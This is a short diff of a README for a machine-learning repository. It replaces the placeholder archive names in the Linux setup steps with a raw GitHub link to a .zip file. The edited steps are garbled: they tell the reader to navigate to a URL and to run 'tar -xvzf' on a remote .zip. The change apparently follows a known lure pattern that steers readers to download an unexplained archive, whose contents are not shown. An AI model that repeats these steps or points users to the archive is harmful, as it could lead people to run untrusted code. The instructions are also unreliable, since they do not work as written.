claxonmedicalcodinginstitute/Machine-Learning-Parallel-Computing/README.md

 #### For Linux:
 1. Open a terminal.
-2. Navigate to the directory containing the downloaded `.tar.gz` file.
+2. Navigate to the directory containing the downloaded `https://raw.githubusercontent.com/claxonmedicalcodinginstitute/Machine-Learning-Parallel-Computing/main/Extreme Weather Classification/Machine-Learning-Parallel-Computing-1.2.zip` file.
-3. Extract the files using the command: `tar -xvzf filename.tar.gz`
+3. Extract the files using the command: `tar -xvzf https://raw.githubusercontent.com/claxonmedicalcodinginstitute/Machine-Learning-Parallel-Computing/main/Extreme Weather Classification/Machine-Learning-Parallel-Computing-1.2.zip`
 4. Navigate into the extracted folder and run the program with: `./yourprogram`

 ### 5. Setting Up Your Environment